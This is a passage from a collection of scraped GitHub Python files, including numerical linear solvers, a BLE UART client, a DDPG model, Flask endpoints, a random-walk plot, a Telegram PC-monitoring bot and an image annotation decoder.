choleski_decomposition(A: Union[np.ndarray, List]) -> np.array:\n \"\"\"\n Finds the Choleski decomposition of matrix A, such that [L][L]^T = A.\n\n Note:\n - A must be symmetric\n - A must be positive definite. If not, then an Assertion error will be raised.\n\n :param A: Matrix of coefficients\n :return: L, the choleski decomposition of A\n \"\"\"\n A = handle_arrays(A)\n n = len(A)\n for k in range(n):\n value = A[k, k] - np.dot(A[k, 0:k], A[k, 0:k])\n assert value >= 0, \"Matrix is not positive definite.\"\n A[k, k] = np.sqrt(value)\n for i in range(k + 1, n):\n A[i, k] = (A[i, k] - np.dot(A[i, 0:k], A[k, 0:k]))/A[k, k]\n for k in range(1, n): A[0:k, k] = 0.0\n return A\n\n\ndef choleski_solve(L: Union[np.ndarray, List], b: Union[np.ndarray, List]) -> np.array:\n \"\"\"\n Solves the solution to LL^Tx=b with L being the Choleski decomposition of some matrix A. Use choleski_decomposition\n to find L prior to using this function.\n\n :param L: Choleski decomposition of some matrix A\n :param b: Solution vector\n :return: The solution x of the linear system\n \"\"\"\n L, b = handle_arrays(L, b)\n n = len(b)\n # Solution of [L]{y} = {b}\n for k in range(n):\n b[k] = (b[k] - np.dot(L[k, 0:k], b[0:k]))/L[k, k]\n # Solution of [L_transpose]{x} = {y}\n for k in range(n - 1, -1, -1):\n b[k] = (b[k] - np.dot(L[k + 1:n, k], b[k + 1:n]))/L[k, k]\n return b\n\n\ndef lu_decomposition3(c: Iterable, d: Iterable, e: Iterable):\n \"\"\"\n Performs the LU decomposition of a tridiagonal matrix. More details can be seen on page 60 of the book in the\n readme.\n\n :param c: Array of the lower diagonal\n :param d: Array of the diagonal\n :param e: Array of the upper diagonal\n :return: c, d, e --> The diagonals of the decomposed matrix\n \"\"\"\n c, d, e = handle_arrays(c, d, e)\n n = len(d)\n for k in range(1, n):\n lam = c[k - 1]/d[k - 1]\n d[k] = d[k] - lam*e[k - 1]\n c[k - 1] = lam\n return c, d, e\n\n\ndef lu_solve3(c: Union[List, np.ndarray], d: Union[List, np.ndarray], e: Union[List, np.ndarray],\n b: Union[List, np.ndarray]):\n \"\"\"\n Solves the solution Ax=b where c, d, and e are the vectors returned from lu_decomposition3.\n\n :param c: c vector from lu_decomposition3\n :param d: d vector from lu_decomposition3\n :param e: e vector from lu_decomposition3\n :param b: Solution vector\n :return: The solution x to Ax=b\n \"\"\"\n b = handle_arrays(b)\n n = len(d)\n for k in range(1, n):\n b[k] = b[k] - c[k - 1]*b[k - 1]\n b[n - 1] = b[n - 1]/d[n - 1]\n for k in range(n - 2, -1, -1):\n b[k] = (b[k] - e[k]*b[k + 1])/d[k]\n return b\n\n\ndef lu_decomposition(A: Union[np.array, List]) -> Tuple[np.array, np.array]:\n \"\"\"\n Performs LU decomposition with pivoting to handle zero's on diagonal.\n\n :param A: Matrix of coefficients\n :return: LU, seq where LU contains U in the upper triangle portion and the non-diagonal terms of L in the lower\n triangle. The permutations are recorded in the vector \"seq.\"\n \"\"\"\n A = handle_arrays(A)\n n = len(A)\n seq = np.arange(n)\n\n # Set up scale factors\n s = np.zeros(n)\n for i in range(n):\n s[i] = max(abs(A[i, :]))\n\n for k in range(0, n - 1):\n\n # Row interchange, if needed\n p = np.argmax(np.abs(A[k:n, k])/s[k:n]) + k\n if p != k:\n _row_interchange(s, k, p)\n _row_interchange(A, k, p)\n _row_interchange(seq, k, p)\n\n # Elimination\n for i in range(k + 1, n):\n if A[i, k] != 0.0:\n lam = A[i, k]/A[k, k]\n A[i, k + 1:n] = A[i, k + 1:n] - lam*A[k, k + 1:n]\n A[i, k] = lam\n return A, seq\n\n\ndef lu_solve(LU: Union[np.array, List], b: Union[np.array, List], seq: Union[np.array, List]) -> np.array:\n \"\"\"\n Solves the solution to LUx=b with LU being the LU decomposition of some matrix A. Use lu_decomposition to find LU\n prior to using this function.\n\n :param LU: The LU matrix returned from lu_decomposition\n :param b: Solution vector\n :param seq: The recorded permutations from lu_decomposition\n :return: The solution x of the linear system\n \"\"\"\n LU, b = handle_arrays(LU, b)\n n = len(LU)\n\n # Rearrange constant vector; store it in [x]\n x = b.copy()\n for i in range(n):\n x[i] = b[seq[i]]\n\n # Solution\n for k in range(1, n):\n x[k] = x[k] - np.dot(LU[k, 0:k], x[0:k])\n x[n - 1] = x[n - 1]/LU[n - 1, n - 1]\n for k in range(n - 2, -1, -1):\n x[k] = (x[k] - np.dot(LU[k, k + 1:n], x[k + 1:n]))/LU[k, k]\n return x\n\n\ndef _row_interchange(v, i, j):\n \"\"\"\n Performs a row interchange by taking in a numpy array \"v\" and swapping rows \"i\" and \"j\".\n\n :param v: Numpy array\n :param i: A row in v\n :param j: A row in v\n \"\"\"\n if len(v.shape) == 1:\n v[i], v[j] = v[j], v[i]\n else:\n v[[i, j], :] = v[[j, i], :]\n\n\nif __name__ == '__main__':\n A_ = np.array([\n [0, -1, 0, 0],\n [0, 0, -1, 1],\n [0, -1, 2, -1],\n [-1, 2, -1, 0]\n ])\n b_ = np.array([1, 0, 0, 0])\n print(gauss_solve(A_, b_))\n print(np.linalg.solve(A_, b_))\n","repo_name":"gabemorris12/eng_analysis","sub_path":"eng_analysis/linear_solvers.py","file_name":"linear_solvers.py","file_ext":"py","file_size_in_byte":6654,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"883402704","text":"##\nimport asyncio\nimport sys\nimport time\n\nfrom bleak import BleakScanner, BleakClient\nfrom bleak.backends.scanner import AdvertisementData\nfrom bleak.backends.device import BLEDevice\n\nclass BLE_UART:\n\t#ESP32_MAC = \"F4:12:FA:5B:3D:81\"#SIDA'\n\t#ESP32_MAC = \"F4:12:FA:5B:3F:A9\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:D6:4D\"#MATMO'\n\t#ESP32_MAC = \"7C:DF:A1:FD:6E:89\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:D5:E9\"\n\t#ESP32_MAC = \"68:B6:B3:21:AF:AD\"#KSIGMI'\n\t#ESP32_MAC = \"68:B6:B3:21:AF:65\"\n\t#ESP32_MAC = \"68:B6:B3:21:AF:39\"\n\t#ESP32_MAC = \"68:B6:B3:21:B2:1D\"\n\tESP32_MAC = \"7C:DF:A1:FD:6E:89\"\n\t#ESP32_MAC = \"7C:DF:A1:FD:73:21\"#TKHASHI'\n\tUART_SERVICE_UUID = \"6E400001-B5A3-F393-E0A9-E50E24DCCA9E\"\n\tUART_RX_CHAR_UUID = \"6E400002-B5A3-F393-E0A9-E50E24DCCA9E\"\n\tUART_TX_CHAR_UUID = \"6E400003-B5A3-F393-E0A9-E50E24DCCA9E\"\n\n\t# All BLE devices have MTU of at least 23. Subtracting 3 bytes overhead, we can\n\t# safely send 20 bytes at a time to any device supporting this service.\n\tUART_SAFE_SIZE = 512\n\t\n\tdef __init__(self, peripheral_name='ESP32 UART Test'):\n\t\tself._peripheral_name = peripheral_name\n\t\tself._rx_queue = asyncio.Queue()\n\t\t\n\tasync def read(self):\n\t\tmsg = await self._rx_queue.get()\n\t\treturn msg\n\n\tasync def read16b(self):\n\t\tmsg = await self._rx_queue.get_nowait()\n\t\treturn msg\n\n\tasync def write(self, msg):\n\t\tif isinstance(msg, str):\n\t\t\tmsg = msg.encode()\n\t\tawait self._client.write_gatt_char(self.UART_RX_CHAR_UUID, msg)\n\t\t\n\tasync def connect(self):\n\t\tself._discovery_queue = asyncio.Queue()\n\t\tdevice = None\n\t\tprint(f\"scanning for {self._peripheral_name}\")\n\t\t# async with BleakScanner(detection_callback=self._find_uart_device):\n\t\t\t# device: BLEDevice = await self._discovery_queue.get()\n\t\tdevice = await BleakScanner.find_device_by_address(self.ESP32_MAC)\n\t\tprint(f\"connecting to {self._peripheral_name} ...\", end=\"\")\n\t\tclient = self._client = BleakClient(device, disconnected_callback=self._handle_disconnect)\n\t\tawait client.connect()\n\t\tawait client.start_notify(self.UART_TX_CHAR_UUID, self._rx_handler)\n\t\tprint(f\" connected\")\n\t\t\n\tasync def disconnect(self):\n\t\tawait self._client.disconnect()\n\t\n\tasync def __aenter__(self):\n\t\treturn self\n\t\n\tasync def __aexit__(self, *args):\n\t\tawait self.disconnect()\n\t\t\n\tdef _rx_handler(self, _: int, data: bytearray):\n\t\tself._rx_queue.put_nowait(data)\n\t\t# print(f\"notify:{time.perf_counter()}\")\n\t\n\tdef _find_uart_device(self, device: BLEDevice, adv: AdvertisementData):\n\t\t# called whenever a device is detected during discovery\n\t\t# ignore all but target device\n\t\tif device.name == self._peripheral_name:\n\t\t\tself._discovery_queue.put_nowait(device)\n\n\t\t\n\tdef _handle_disconnect(self, _: BleakClient):\n\t\tself._rx_queue.put_nowait(None)\n\t\tprint(\"Device was disconnected, goodbye.\")\n\t\t# cancelling all tasks effectively ends the program\n\t\tfor task in asyncio.all_tasks():\n\t\t\ttask.cancel()\n\t\t\n\tasync def _queue_clr(self):\n\t\twhile self._rx_queue.qsize() != 0:\n\t\t\t# print(self._rx_queue.qsize())\n\t\t\tawait self._rx_queue.get()\n\t\t\n\n","repo_name":"NarimiMatsumoto/AKM-SOL2-MMW","sub_path":"ble_uart.py","file_name":"ble_uart.py","file_ext":"py","file_size_in_byte":2935,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32233698347","text":"import os\nimport json\n\nclass ConfigManager:\n def __init__(self):\n data = self.get_config_data()\n self.key = data['API_KEY'] if data != None else None\n \n def get_config_data(self):\n config_path = os.path.expanduser('~/.phoenixconfig')\n\n # If the config file exists, read the name from it.\n if os.path.exists(config_path):\n with open(config_path, 'r') as f:\n config = json.load(f)\n return config\n else:\n return None\n\n def save_config_data(self):\n config_path = os.path.expanduser('~/.phoenixconfig')\n\n with open(config_path, 'w') as f:\n json.dump({\n 'API_KEY':self.key\n }, f)","repo_name":"colbyb2/phoenix","sub_path":"Phoenix/config.py","file_name":"config.py","file_ext":"py","file_size_in_byte":728,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"5580871645","text":"import random\r\nimport copy\r\nimport torch\r\nimport numpy as np\r\nimport torch.nn as nn\r\nimport torch.nn.functional as F\r\nimport torch.optim as optim\r\nnum_agents = 2\r\n\r\n\r\ndef hidden_init(layer):\r\n fan_in = layer.weight.data.size()[0]\r\n lim = 1. / np.sqrt(fan_in)\r\n return (-lim, lim)\r\n\r\nclass Actor(nn.Module):\r\n\r\n def __init__(self, state_size, action_size, seed, fc1_units=200, fc2_units=150):\r\n super(Actor, self).__init__()\r\n self.seed = torch.manual_seed(seed)\r\n self.fc1 = nn.Linear(state_size, fc1_units)\r\n self.fc2 = nn.Linear(fc1_units, fc2_units)\r\n self.fc3 = nn.Linear(fc2_units, action_size)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n self.fc1.weight.data.uniform_(*hidden_init(self.fc1))\r\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\r\n self.fc3.weight.data.uniform_(-3e-3, 3e-3)\r\n\r\n def forward(self, state):\r\n x = F.relu(self.fc1(state))\r\n x = F.relu(self.fc2(x))\r\n return F.tanh(self.fc3(x))\r\n\r\nclass Critic(nn.Module):\r\n\r\n def __init__(self, state_size, action_size, seed, fcs1_units=200, fc2_units=150):\r\n super(Critic, self).__init__()\r\n self.seed = torch.manual_seed(seed)\r\n self.fcs1 = nn.Linear((state_size+action_size) * num_agents, fcs1_units)\r\n self.fc2 = nn.Linear(fcs1_units, fc2_units)\r\n self.fc3 = nn.Linear(fc2_units, 1)\r\n self.reset_parameters()\r\n\r\n def reset_parameters(self):\r\n self.fcs1.weight.data.uniform_(*hidden_init(self.fcs1))\r\n self.fc2.weight.data.uniform_(*hidden_init(self.fc2))\r\n self.fc3.weight.data.uniform_(-3e-3, 3e-3)\r\n \r\n def forward(self, state, action):\r\n xs = torch.cat((state, action), dim=1)\r\n x = F.relu(self.fcs1(xs))\r\n x = F.relu(self.fc2(x))\r\n return self.fc3(x)\r\n\r\n\r\nclass OUNoise:\r\n \"\"\"Ornstein-Uhlenbeck process.\"\"\"\r\n\r\n def __init__(self, size, seed, mu=0., theta=0.15, sigma=0.2):\r\n \"\"\"Initialize parameters and noise process.\"\"\"\r\n self.mu = mu * np.ones(size)\r\n self.theta = theta\r\n self.sigma = sigma\r\n self.seed = random.seed(seed)\r\n self.size = size\r\n self.reset() \r\n \r\n def reset(self):\r\n \"\"\"Reset the internal state (= noise) to mean (mu).\"\"\"\r\n self.state = copy.copy(self.mu)\r\n\r\n def sample(self):\r\n \"\"\"Update internal state and return it as a noise sample.\"\"\"\r\n x = self.state\r\n dx = self.theta * (self.mu - x) + self.sigma * np.random.randn(self.size)\r\n self.state = x + dx\r\n return self.state","repo_name":"keyttu/Udacity-DRLND-P3-Collaboration-and-Competition","sub_path":"Agent_Model.py","file_name":"Agent_Model.py","file_ext":"py","file_size_in_byte":2611,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"30246060001","text":"#!/usr/bin/env python\nfrom seamm_dashboard import create_app, options\nfrom waitress import serve\n\n\ndef run():\n app = create_app()\n\n if \"debug\" in options:\n app.run(debug=True, use_reloader=True) \n else: \n # serve using waitress\n serve(app, port=options[\"port\"])\n\n\nif __name__ == \"__main__\":\n run()\n","repo_name":"molssi-seamm/seamm_dashboard","sub_path":"seamm_dashboard/results_dashboard.py","file_name":"results_dashboard.py","file_ext":"py","file_size_in_byte":334,"program_lang":"python","lang":"en","doc_type":"code","stars":4,"dataset":"github-code","pt":"53"} +{"seq_id":"14035786439","text":"import xml.etree.ElementTree as ET\nfrom flask import request, Blueprint\nfrom Modules.Sessions.Config import sessionUpdateSchemaLocation, sessionUpdateXmlSchemaLocation, sessionUpdateXmlDataLocation\nfrom Modules.Util import validateJsonResponse, validateXmlResponse\n\nupdateSessions = Blueprint('updateSessions', __name__)\n\n\n#UPDATE WITH XML\n@updateSessions.route('/sessionUpdate', methods=['POST'])\ndef updateSession():\n from appRestApi import db, Sessions\n if (request.is_json):\n sessionData = request.get_json()\n\n # Validates sent JSON before update\n if validateJsonResponse(sessionUpdateSchemaLocation, sessionData) == False:\n Sessions.query.filter_by(id=sessionData['id']).update(dict(date=sessionData['date']))\n Sessions.query.filter_by(id=sessionData['id']).update(dict(time=sessionData['time']))\n Sessions.query.filter_by(id=sessionData['id']).update(dict(duration=sessionData['duration']))\n db.session.commit()\n db.session.close()\n\n else:\n return \"There were errors while validating the json data\"\n\n else:\n updateSessionXml()\n\n return \"Successfuly updated session!\"\n\n\n# UPDATE WITH XML\ndef updateSessionXml():\n from appRestApi import db, Sessions\n sessionData = request.get_data()\n\n # Transforms data received into a non-flat xml file\n info = ET.fromstring(sessionData)\n tree = ET.ElementTree(info)\n tree.write(sessionUpdateXmlDataLocation)\n\n if validateXmlResponse(sessionUpdateXmlSchemaLocation, sessionUpdateXmlDataLocation) == True:\n print(\"Successfuly validated xml!\")\n\n # Iterates over xml and finds necessarry data belonging to tags\n for item in tree.iter('session'):\n updatedSessionID = item.find('id').text\n updatedSessionDate = item.find('date').text\n updatedSessionTime = item.find('time').text\n updatedSessionDuration = item.find('duration').text\n\n Sessions.query.filter_by(id=updatedSessionID).update(dict(date=updatedSessionDate))\n Sessions.query.filter_by(id=updatedSessionID).update(dict(time=updatedSessionTime))\n Sessions.query.filter_by(id=updatedSessionID).update(dict(duration=updatedSessionDuration))\n db.session.commit()\n db.session.close()\n\n return \"Successfuly updated session!\"\n\n","repo_name":"stefanuntura/dataProcessingAPI","sub_path":"Modules/Sessions/UPDATE.py","file_name":"UPDATE.py","file_ext":"py","file_size_in_byte":2349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4529910278","text":"# 在类 RandomWalk 中, x_step 和 y_step 是根据相同的条件生成的:\n# 从列表 [1, -1] 中随机地选择方向,并从列表 [0, 1, 2, 3, 4]中随机地选择距离。\n# 请修改这些列表中的值,看看对随机漫步路径有何影响。\n# 尝试使用更长的距离选择列表,如 0~8 ;或者将 -1 从 x 或 y 方向列表中删除。\n\nfrom random import choice\nimport matplotlib.pyplot as plt\n\nclass RandomWalk():\n \"\"\"生成一个随机漫步数据的类\"\"\"\n\n def __init__(self, num_points = 5000): # point 点/指向 points 要点\n \"\"\"初始化随机漫步的属性\"\"\"\n self.num_points = num_points\n\n # 所有随机漫步都要始于(0,0)\n self.x_values = [0]\n self.y_values = [0]\n\n def fill_walk(self):\n \"\"\"计算随机漫步包含的所有点\"\"\"\n\n # 不断漫步,直到列表达到指定的长度\n '''\n 建立了一个循环,这个循环不断运行,直到漫步包含所需数量的点。\n 这个方法的主要部分告诉 Python 如何模拟四种漫步决定:向右走还是向左走?\n 沿指定的方向走多远?向上走还是向下走?沿选定的方向走多远?\n '''\n while len(self.x_values) < self.num_points:\n\n # 决定前进方向以及沿这个方向前进的距离\n x_direction = choice([1]) # 结果要么向右走1,要么向左走-1\n x_distance = choice([0, 1, 2, 3, 4,5,6,7,8]) # 随机走多远(包含0,不仅能沿两个轴移动,还能沿y轴移动)\n '''\n 将移动方向乘以移动距离,以确定沿 x 和 y 轴移动的距离。\n 如果 x_step 为正,将向右移动,为负将向左移动,而为零将垂直移动;\n 如果 y_step 为正,就意味着向上移动,为负意味着向下移动,而为零意味着水平移动。\n 如果 x_step 和 y_step 都为零,则意味着原地踏步,我们拒绝这样的情况,接着执行下一次循环\n '''\n x_step = x_direction * x_distance\n\n y_direction = choice([1,-1])\n y_distance = choice([0, 1, 2, 3, 4,5,6,7,8])\n y_step = y_direction * y_distance\n\n # 拒绝原地踏步\n if x_step == 0 and y_step == 0:\n continue\n\n # 计算下一个点的 x 和 y 值\n '''\n 为获取漫步中下一个点的 x 值,我们将 x_step 与 x_values 中的最后一个值相加,对于 y 值也做相同的处理。\n 获得下一个点的 x 值和 y 值后,我们将它们分别附加到列表 x_values 和 y_values 的末尾\n 这里用 [-1],因为后面用了 .append() \n '''\n next_x = self.x_values[-1] + x_step\n next_y = self.y_values[-1] + y_step\n\n self.x_values.append(next_x)\n self.y_values.append(next_y)\n\n\nwhile True:\n\n # 创建一个RandomWalk 实例,并将其包含的点都绘制出来\n rw = RandomWalk(50000) # 增加点数,初始5000\n rw.fill_walk()\n\n # 设置绘图窗口的尺寸\n '''\n 函数 figure() 用于指定图表的宽度、高度、分辨率和背景色。\n 你需要给形参 figsize 指定一个元组,向 matplotlib 指出绘图窗口的尺寸,单位为英寸。\n Python 假定屏幕分辨率为 80 像素 / 英寸,如果上述代码指定的图表尺寸不合适,可根据需要调整其中的数字。\n 如果你知道自己的系统的分辨率,可使用形参 dpi 向 figure() 传递该分辨率,以有效地利用可用的屏幕空间,如下所示:\n plt.figure(dpi=128, figsize=(10,6)) \n '''\n plt.figure(figsize = (6,4))\n\n '''\n 我们将使用颜色映射来指出漫步中各点的先后顺序,并删除每个点的黑色轮廓,让它们的颜色更明显。\n 为根据漫步中各点的先后顺序进行着色,我们传递参数 c ,并将其设置为一个列表,\n 其中包含各点的先后顺序。由于这些点是按顺序绘制的,因此给参数 c 指定的列表只需包含数字 1~5000\n '''\n point_numbers = list(range(rw.num_points))\n plt.scatter(rw.x_values, rw.y_values, c=point_numbers, cmap=plt.cm.Blues,\n edgecolors='none', s=1) # 增加点数之后,调小每个点的大小\n\n # 隐藏坐标轴\n plt.axes().get_xaxis().set_visible(False)\n plt.axes().get_yaxis().set_visible(False)\n\n # 突出起点和终点\n plt.scatter(0, 0, c='green', edgecolors='none', s=100)\n plt.scatter(rw.x_values[-1], rw.y_values[-1], c='red',\n edgecolors='none', s=100)\n\n plt.show()\n\n keep_running = input(\"Make another walk? (y/n) :\")\n if keep_running == \"n\":\n break","repo_name":"pangfeiyo/PythonLearn","sub_path":"Python:从入门到实践/从入门到实践代码/第15章 生成数据/15.3 随机漫步/动动手/15-4 改进的随机漫步.py","file_name":"15-4 改进的随机漫步.py","file_ext":"py","file_size_in_byte":4801,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"17552224417","text":"# coding: utf-8\n\nfrom apisRequest import Search\nfrom strToken import tokensTeste\nimport json\nimport os\nimport time\nimport pprint\n\ns = Search()\ntks = tokensTeste()\n\ndef limpar():\n os.system('cls' if os.name == 'nt' else 'clear')\n\ndef get_cep(cep = \"83602690\"):\n\n url = \"https://viacep.com.br/ws/%s/json/\" % (cep)\n\n s.make_url(url)\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n s.make_soup('html.parser')\n\n return json.loads(s.content.content.decode('utf-8'))\n\ndef send_post(message=\"Test\"):\n s.make_url(\"http://localhost/test-python-request.php\")\n s.params = {'come-of-python':message}\n s.headers = None\n myTry = s.make_content('post')\n\n if myTry == 1:\n return s.content.content\n else:\n return 0\n\ndef get_holidays():\n s.make_url(\"https://api.calendario.com.br/?json=true&token=%s&ano=2019&estado=PR&cidade=Campo_Largo\" % (tks.tk_holiday))\n s.make_content('get')\n\n list_holidays = json.loads(s.content.content.decode('utf-8'))\n\n resume_list = []\n\n for holiday in list_holidays:\n resume_list.append(\n [holiday.get('name'),holiday.get('date')]\n )\n return resume_list\n\ndef statistics_names_by_ibge(name=\"Maria\"):\n s.make_url(\"https://servicodados.ibge.gov.br/api/v2/censos/nomes/%s\" % (name))\n s.headers = {'Content-type':'application/json'}\n s.make_content('get')\n\n data_statistics = json.loads(s.content.content.decode('utf-8'))\n\n return data_statistics\n\ncont = 0\n\nwhile cont < 100:\n try:\n print(\"LIST OPTIONS:\")\n\n print(\"[1] Function get_cep()\")\n print(\"[2] Function send_post()\")\n print(\"[3] Function get_holidays()\")\n print(\"[4] statistics_names_by_ibge()\")\n print(\"[0] Stop this code\")\n\n option = int(input(\"What option do you wanna?\"))\n return_function = None\n\n if option == 1:\n param = input(\"Enter with the cep:\")\n return_function = get_cep(param)\n\n elif option == 2:\n param = input(\"Enter with the message:\")\n return_function = send_post(param)\n\n elif option == 3:\n return_function = get_holidays()\n\n elif option == 4:\n param = input(\"Enter with the name:\")\n return_function = statistics_names_by_ibge(param)\n\n elif option == 0:\n break\n else:\n break\n\n qtde_time = 3\n qtde_time = int(input(\"How much time do you wanna see the answer?\"))\n\n bar = \"\"\n\n for i in range(qtde_time):\n bar += \"\\033[33;43m \\033[m\"\n pp = pprint.PrettyPrinter()\n pp.pprint(return_function)\n print(bar)\n\n time.sleep(1)\n limpar()\n\n limpar()\n except Exception as e:\n print(e)\n continue\n\n cont += 1","repo_name":"devBino/python","sub_path":"apis_with_request/search_in_apis.py","file_name":"search_in_apis.py","file_ext":"py","file_size_in_byte":2837,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983030107","text":"\"\"\"\n수 찾기\n문제: N개의 정수 A[1], A[2],...A[N]이 주어져 있을 때, \n이 안에 X라는 정수가 존재하는지 알아내는 프로그램을 작성하시오.\n\n입력: 첫째 줄에 자연수 N(1 <= N <= 100,000)이 주어진다. \n다음 줄에는 N개의 정수 A[1],...A[N]이 주어진다.\n다음 줄에는 M(1 <= M <= 100,000)이 주어진다.\n다음 줄에는 M개의 수들이 주어지는데, 이 수들이 A안에 존재하는지 알아내면 된다.\n모든 정수의 범위는 -2^31 보다 크거나 같고 2^31보다 작다.\n\n출력: M개의 줄에 답을 출력한다. 존재하면 1을 존재하지 않으면 0을 출력한다.\n\n5\n4 1 5 2 3\n5\n1 3 7 9 5\n\n1\n1\n0\n0\n1\n\"\"\"\nimport sys\n\ndef binary_search(n_list, find_num):\n left = 0\n right = len(n_list) - 1\n while left <= right:\n mid = (left + right) // 2\n if n_list[mid] == find_num:\n return 1\n elif n_list[mid] > find_num:\n right = mid - 1\n else:\n left = mid + 1\n return 0\n\n\ndef solution(n, n_list, m, m_list):\n n_list.sort()\n for find_num in m_list:\n print(binary_search(n_list, find_num))\n\ndef init():\n n = int(sys.stdin.readline())\n n_list = list(map(int, sys.stdin.readline().split()))\n m = int(sys.stdin.readline())\n m_list = list(map(int, sys.stdin.readline().split()))\n solution(n, n_list, m, m_list)\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/boj/1920.py","file_name":"1920.py","file_ext":"py","file_size_in_byte":1330,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"24157788374","text":"import os\r\nimport time\r\nimport threading\r\nimport telebot\r\nimport psutil\r\n\r\nTOKEN = \"\" # Токен TG бота (@BotFather)\r\nOWNER_ID = 1532847216 # ID админа, необходим для доступа к боту\r\nALERT_THRESHOLD = 85 # Аварийный процент загрузки, при котором автоматический высылается предупреждение\r\nALERT_INTERVAL = 60 # Секунды задержки между авто. проверкой состояния\r\n\r\nbot = telebot.TeleBot(TOKEN)\r\n\r\ndef is_owner(message):\r\n return message.from_user.id == OWNER_ID\r\n\r\n@bot.message_handler(commands=['start'], func=is_owner)\r\ndef start(message):\r\n bot.reply_to(message, \"Привет! Я бот, который отслеживает состояние вашего ПК.\")\r\n\r\n@bot.message_handler(commands=['status'], func=is_owner)\r\ndef get_status(message):\r\n cpu_percent = psutil.cpu_percent()\r\n memory = psutil.virtual_memory()\r\n mem_percent = memory.percent\r\n bot.reply_to(message, f\"CPU: {cpu_percent}%\\nОперативная память: {mem_percent}%\")\r\n\r\ndef monitor_status():\r\n while True:\r\n memory = psutil.virtual_memory()\r\n mem_percent = memory.percent\r\n cpu_percent = psutil.cpu_percent()\r\n\r\n if cpu_percent > ALERT_THRESHOLD or mem_percent > ALERT_THRESHOLD:\r\n bot.send_message(chat_id=OWNER_ID, text=f\"⚠️ Внимание! Высокая нагрузка:\\nCPU: {cpu_percent}%\\nОперативная память: {mem_percent}%\")\r\n\r\n time.sleep(ALERT_INTERVAL)\r\n\r\nif __name__ == '__main__':\r\n monitor_thread = threading.Thread(target=monitor_status)\r\n monitor_thread.start()\r\n bot.polling(none_stop=True)\r\n","repo_name":"SAJOC-a/tg-bot-pc-check","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":1751,"program_lang":"python","lang":"ru","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"29899631082","text":"from selenium import webdriver\n\nclass FindByXpath():\n\n def testMethod(self):\n driver = webdriver.Firefox()\n baseUrl = \"https://learn.letskodeit.com/p/practice\"\n\n driver.get(baseUrl)\n elementByXpath = driver.find_element_by_xpath(\"//*[@id='name']\")\n\n if elementByXpath is not None:\n print (\"We found an element by XPATH!\")\n\n elementByCSS = driver.find_element_by_css_selector(\"#displayed-text\")\n\n if elementByCSS is not None:\n print (\"We found an element by CSS!\")\n\n driver.quit()\n\n\nff = FindByXpath()\nff.testMethod()","repo_name":"bartekh21/mighty-python","sub_path":"FindByXpath.py","file_name":"FindByXpath.py","file_ext":"py","file_size_in_byte":597,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"32179930631","text":"#!/usr/bin/env python\n\nimport json\nimport math\nimport numpy\nfrom PIL import Image\n\n\nclass AnnotationData:\n def __init__(self, labels, image_data):\n self._labels = labels\n self._image_shape = image_data.shape[:2]\n\n # Create a dictionary for each label\n # Each dictionary will map object numbers to their data\n self._label_sets = [dict() for i in range(len(self._labels))]\n # Create layer for each label (this will hold all objects on one layer)\n self._label_single = [\n numpy.zeros(self._image_shape, dtype=bool)\n for i in range(len(self._labels))\n ]\n\n raw_annotation = numpy.bitwise_or(numpy.bitwise_or(\n image_data[:, :, 0].astype(numpy.uint32),\n image_data[:, :, 1].astype(numpy.uint32) << 8),\n image_data[:, :, 2].astype(numpy.uint32) << 16)\n\n ones = numpy.ones_like(raw_annotation, dtype=numpy.uint8)\n zeros = numpy.zeros_like(raw_annotation, dtype=numpy.uint8)\n\n unique_combinations = numpy.unique(raw_annotation)\n for combination in unique_combinations:\n # Decode combination into set of labels and objects.\n layers = _rec_separate_layers(\n combined_layers=combination,\n times_combined=math.ceil(math.log(len(self._labels), 2))\n )\n for layer in layers:\n object_mask = numpy.where(raw_annotation == combination, ones, zeros)\n\n if layer[1] in self._label_sets[layer[0]]:\n existing_mask = self._label_sets[layer[0]][layer[1]]\n object_mask = numpy.logical_or(object_mask, existing_mask)\n\n # Add object to dict\n self._label_sets[layer[0]][layer[1]] = object_mask\n # Append object to layer\n self._label_single[layer[0]] = numpy.logical_or(\n self._label_single[layer[0]], object_mask\n )\n\n def get_classes(self):\n \"\"\"Returns a count of objects in each class\n \n :return: A dictionary eg. {'tomato': 5, 'leaf': 3, 'stem': 4}\n \"\"\"\n dictionary = dict()\n for i, label in enumerate(self._labels):\n dictionary[label] = len(self._label_sets[i])\n return dictionary\n\n def get_mask(self, label_name, object_number=None):\n \"\"\"Returns a boolean mask\n \n :param label_name: the label to mask eg. 'tomato'\n :param object_number: optional object number\n :return: An array the same size as the image with 1 representing the\n object and 0 elsewhere. If no object is specified, all objects\n with matching label will be masked as 1\n \"\"\"\n try:\n label_index = self._labels.index(label_name)\n except ValueError:\n return None\n\n if object_number is None:\n return self._label_single[label_index]\n else:\n try:\n return self._label_sets[label_index][object_number]\n except KeyError:\n return None\n\n\ndef _rec_separate_layers(combined_layers, times_combined, counter=0):\n unpacked = _inverse_cantor_pair(combined_layers)\n layers = []\n if counter < times_combined:\n layers.extend(_rec_separate_layers(unpacked[0], times_combined, counter + 1))\n layers.extend(_rec_separate_layers(unpacked[1], times_combined, counter + 1))\n else:\n if unpacked[0] != 0:\n layers.append(unpacked)\n return layers\n\n\ndef _inverse_cantor_pair(z):\n w = math.floor((math.sqrt(8*z+1)-1)/2)\n t = (math.pow(w, 2) + 